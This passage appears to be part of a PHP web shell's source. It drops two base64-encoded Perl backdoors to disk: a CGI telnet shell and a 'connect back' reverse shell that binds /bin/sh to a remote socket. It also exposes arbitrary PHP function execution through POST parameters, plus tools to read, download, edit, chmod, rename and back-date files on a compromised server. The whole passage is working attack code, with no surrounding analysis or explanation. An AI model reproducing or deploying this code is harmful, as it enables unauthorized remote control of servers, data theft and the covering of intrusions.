  1839. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
  1840. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
  1841. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
  1842. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
  1843. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
  1844. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
  1845. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1846. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
  1847. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
  1848. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
  1849. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
  1850. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1851. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
  1852. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
  1853. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
  1854. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
  1855. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
  1856. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
  1857. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
  1858. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
  1859. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
  1860. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
  1861. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
  1862. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1863. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
  1864. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
  1865. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
  1866. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
  1867. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
  1868. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1869. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1870. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
  1871. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
  1872. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
  1873. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
  1874. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
  1875. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
  1876. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
  1877. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
  1878. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
  1879. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
  1880. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1881. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
  1882. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
  1883. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
  1884. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
  1885. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1886. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
  1887. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
  1888. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
  1889. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
  1890. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
  1891. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
  1892. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
  1893. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
  1894. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
  1895. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
  1896. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
  1897. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
  1898. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
  1899. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
  1900. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
  1901. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
  1902. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
  1903. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
  1904. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
  1905. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
  1906. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1907. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
  1908. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
  1909. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
  1910. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
  1911. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
  1912. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1913. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
  1914. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
  1915. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
  1916. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
  1917. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
  1918. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
  1919. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
  1920. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
  1921. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
  1922. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
  1923. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
  1924. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
  1925. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
  1926. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1927. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
  1928. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1929. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1930. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
  1931. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
  1932. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
  1933. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
  1934. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
  1935. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
  1936. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
  1937. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
  1938. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
  1939. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
  1940. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
  1941. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
  1942. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
  1943. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
  1944. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
  1945. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
  1946. $file = fopen("izo.cin", "w+");
  1947. $write = fwrite($file, base64_decode($cgishellizocin));
  1948. fclose($file);
  1949. chmod("izo.cin", 0755);
  1950. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  1951. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  1952. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  1953. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  1954. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  1955. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  1956. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  1957. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  1958. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  1959. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  1960. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  1961. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  1962. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  1963. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  1964. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  1965. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  1966. YXRhY2hlZFxuXG4iOw==';
  1967. $file = fopen("dc.pl", "w+");
  1968. $write = fwrite($file, base64_decode($netcatshell));
  1969. fclose($file);
  1970. chmod("dc.pl", 0755);
  1971. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
  1972. echo '</div>';
  1973. printFooter();
  1974. }
  1975.  
  1976. function actionStringTools() {
  1977. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  1978. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  1979. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  1980. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  1981. if(isset($_POST['ajax'])) {
  1982. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  1983. ob_start();
  1984. if(function_exists($_POST['p1']))
  1985. echo $_POST['p1']($_POST['p2']);
  1986. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  1987. echo strlen($temp), "\n", $temp;
  1988. exit;
  1989. }
  1990. printHeader();
  1991. echo '<h1>String conversions</h1><div class=content>';
  1992. $stringTools = array(
  1993. 'Base64 encode' => 'base64_encode',
  1994. 'Base64 decode' => 'base64_decode',
  1995. 'Url encode' => 'urlencode',
  1996. 'Url decode' => 'urldecode',
  1997. 'Full urlencode' => 'full_urlencode',
  1998. 'md5 hash' => 'md5',
  1999. 'sha1 hash' => 'sha1',
  2000. 'crypt' => 'crypt',
  2001. 'CRC32' => 'crc32',
  2002. 'ASCII to HEX' => 'ascii2hex',
  2003. 'HEX to ASCII' => 'hex2ascii',
  2004. 'HEX to DEC' => 'hexdec',
  2005. 'HEX to BIN' => 'hex2bin',
  2006. 'DEC to HEX' => 'dechex',
  2007. 'DEC to BIN' => 'decbin',
  2008. 'BIN to HEX' => 'bin2hex',
  2009. 'BIN to DEC' => 'bindec',
  2010. 'String to lower case' => 'strtolower',
  2011. 'String to upper case' => 'strtoupper',
  2012. 'Htmlspecialchars' => 'htmlspecialchars',
  2013. 'String length' => 'strlen',
  2014. );
  2015. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  2016. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  2017. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  2018. foreach($stringTools as $k => $v)
  2019. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  2020. echo "</select><input type='submit' value='Submit'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  2021. if(!empty($_POST['p1'])) {
  2022. if(function_exists($_POST['p1']))
  2023. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  2024. }
  2025. echo"</pre></div>";
  2026. printFooter();
  2027. }
  2028. function actionFilesTools() {
  2029. if( isset($_POST['p1']) )
  2030. $_POST['p1'] = urldecode($_POST['p1']);
  2031. if(@$_POST['p2']=='download') {
  2032. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  2033. ob_start("ob_gzhandler", 4096);
  2034. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  2035. if (function_exists("mime_content_type")) {
  2036. $type = @mime_content_type($_POST['p1']);
  2037. header("Content-Type: ".$type);
  2038. }
  2039. $fp = @fopen($_POST['p1'], "r");
  2040. if($fp) {
  2041. while(!@feof($fp))
  2042. echo @fread($fp, 1024);
  2043. fclose($fp);
  2044. }
  2045. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  2046. }
  2047. exit;
  2048. }
  2049. if( @$_POST['p2'] == 'mkfile' ) {
  2050. if(!file_exists($_POST['p1'])) {
  2051. $fp = @fopen($_POST['p1'], 'w');
  2052. if($fp) {
  2053. $_POST['p2'] = "edit";
  2054. fclose($fp);
  2055. }
  2056. }
  2057. }
  2058. printHeader();
  2059. echo '<h1>File tools</h1><div class=content>';
  2060. if( !file_exists(@$_POST['p1']) ) {
  2061. echo 'File not exists';
  2062. printFooter();
  2063. return;
  2064. }
  2065. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  2066. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  2067. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  2068. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  2069. if( empty($_POST['p2']) )
  2070. $_POST['p2'] = 'view';
  2071. if( is_file($_POST['p1']) )
  2072. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  2073. else
  2074. $m = array('Chmod', 'Rename', 'Touch');
  2075. foreach($m as $v)
  2076. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  2077. echo '<br><br>';
  2078. switch($_POST['p2']) {
  2079. case 'view':
  2080. echo '<pre class=ml1>';
  2081. $fp = @fopen($_POST['p1'], 'r');
  2082. if($fp) {
  2083. while( !@feof($fp) )
  2084. echo htmlspecialchars(@fread($fp, 1024));
  2085. @fclose($fp);
  2086. }
  2087. echo '</pre>';
  2088. break;
  2089. case 'highlight':
  2090. if( is_readable($_POST['p1']) ) {
  2091. echo '<div class=ml1 style="background-color: #000;color:black;">';
  2092. $code = highlight_file($_POST['p1'],true);
  2093. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  2094. }
  2095. break;
  2096. case 'chmod':
  2097. if( !empty($_POST['p3']) ) {
  2098. $perms = 0;
  2099. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  2100. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  2101. if(!@chmod($_POST['p1'], $perms))
  2102. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  2103. else
  2104. die('<script>g(null,null,null,null,"")</script>');
  2105. }
  2106. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="Submit"></form>';
  2107. break;
  2108. case 'edit':
  2109. if( !is_writable($_POST['p1'])) {
  2110. echo 'File isn\'t writeable';
  2111. break;
  2112. }
  2113. if( !empty($_POST['p3']) ) {
  2114. @file_put_contents($_POST['p1'],$_POST['p3']);
  2115. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  2116. }
  2117. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  2118. $fp = @fopen($_POST['p1'], 'r');
  2119. if($fp) {
  2120. while( !@feof($fp) )
  2121. echo htmlspecialchars(@fread($fp, 1024));
  2122. @fclose($fp);
  2123. }
  2124. echo '</textarea><input type=submit value="Submit"></form>';
  2125. break;
  2126. case 'hexdump':
  2127. $c = @file_get_contents($_POST['p1']);
  2128. $n = 0;
  2129. $h = array('00000000<br>','','');
  2130. $len = strlen($c);
  2131. for ($i=0; $i<$len; ++$i) {
  2132. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  2133. switch ( ord($c[$i]) ) {
  2134. case 0: $h[2] .= ' '; break;
  2135. case 9: $h[2] .= ' '; break;
  2136. case 10: $h[2] .= ' '; break;
  2137. case 13: $h[2] .= ' '; break;
  2138. default: $h[2] .= $c[$i]; break;
  2139. }
  2140. $n++;
  2141. if ($n == 32) {
  2142. $n = 0;
  2143. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  2144. $h[1] .= '<br>';
  2145. $h[2] .= "\n";
  2146. }
  2147. }
  2148. echo '<table cellspacing=1 cellpadding=5 bgcolor=#000><tr><td bgcolor=#000><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#000><pre>'.$h[1].'</pre></td><td bgcolor=#000><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  2149. break;
  2150. case 'rename':
  2151. if( !empty($_POST['p3']) ) {
  2152. if(!@rename($_POST['p1'], $_POST['p3']))
  2153. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  2154. else
  2155. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  2156. }
  2157. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="Submit"></form>';
  2158. break;
  2159. case 'touch':
  2160. if( !empty($_POST['p3']) ) {
  2161. $time = strtotime($_POST['p3']);
  2162. if($time) {
  2163. if(@touch($_POST['p1'],$time,$time))
  2164. die('<script>g(null,null,null,null,"")</script>');
  2165. else {
  2166. echo 'Fail!<script>document.mf.p3.value="";</script>';
  2167. }
  2168. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  2169. }
  2170. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="Submit"></form>';
  2171. break;
  2172. case 'mkfile':
  2173. break;
  2174. }
  2175. echo '</div>';
  2176. printFooter();
  2177. }
  2178. function actionConsole() {
  2179. if(isset($_POST['ajax'])) {
  2180. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  2181. ob_start();
  2182. echo "document.cf.cmd.value='';\n";
